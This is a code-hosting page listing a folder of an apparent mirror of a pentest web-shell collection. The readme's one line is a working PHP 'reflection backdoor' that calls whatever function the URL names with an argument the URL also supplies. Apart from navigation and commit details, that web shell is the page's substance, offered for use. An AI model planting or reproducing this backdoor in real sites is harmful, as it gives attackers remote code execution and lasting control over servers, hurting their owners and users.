This website requires JavaScript.
Explore
Help
Sign In
PenTest
/
webshell
Watch
1
Star
0
Fork
0
You've already forked webshell
mirror of
https://github.com/tennc/webshell.git
synced
2025-12-06 12:51:28 +00:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
2c1c82b4c16b4cbcd5f3b2efd29d95b009ce6dfc
webshell
/
php
/
p2j
History
tennc
c77a9dad29
update readme.md
2014-07-28 10:09:59 +08:00
..
11.jpg
update php reflection webshell
2014-07-28 09:47:51 +08:00
PHP reflection.php.txt
update php reflection webshell
2014-07-28 09:47:51 +08:00
PHP反射后门.php.txt
updaet p2j php reflection php shell
2014-07-28 09:57:19 +08:00
Readme.md
update readme.md
2014-07-28 10:09:59 +08:00
Readme.md
code:
<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?>
Reference in New Issue
View Git Blame
Copy Permalink